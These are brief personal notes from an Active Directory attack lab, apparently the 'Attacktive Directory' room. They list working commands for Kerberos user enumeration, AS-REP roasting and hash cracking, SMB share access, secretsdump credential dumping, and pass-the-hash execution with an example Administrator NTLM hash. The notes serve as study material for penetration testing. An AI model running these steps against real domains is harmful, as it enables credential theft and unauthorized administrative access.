Attacktiv

* Kerberos enumerating users kerbrute userenum --dc <IP> -d "<domain>" userlist.txt [domain can be enumerated vai enum4linux] nmap --script krb5-enum-users --script-args='krb5-enum-users.realm="<domain>",userdb=<filepath>' <IP> -p 88

Kerberos credentials are case sensitive. So therefore, "NAME@ibm.com" and "name@ibm.com" and "NaMe@ibm.com" are 3 separate credentials.

* users with no-preauth-required GetNPUsers.py <domain>/ -dc-ip <ip> -usersfile vu2 -no-pass [vu2 contains only names abc, no abc@xyz] [It is important tho, to specify -no-pass in the script, otherwise a badpwdcount entry will be added to the user]

hashcat.bin -m 18200 --force -a 0 as-rep.hash passwordlist.txt [a=0 for wordslist]

- list shares smbclient -U "<uname>%<pwd>" -L <IP> - connecting to sharexs smbclient -U "<uname>%<pwd>" //<IP>/<share>

* Dumping secrets like NTLM hashes,etc. secretsdump.py <domain>/<uname>:<pwd>@<IP>

- NTLM hash with only NT component: Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc aad3b435b51404eeaad3b435b51404ee = no password

- Running cmds using NTLM hash docker run docker.io/byt3bl33d3r/crackmapexec:latest smb 10.10.115.121 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc -x whoami evil-winrm -i 10.10.252.217 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

* Check for open RDP ports, use remmina

Last updated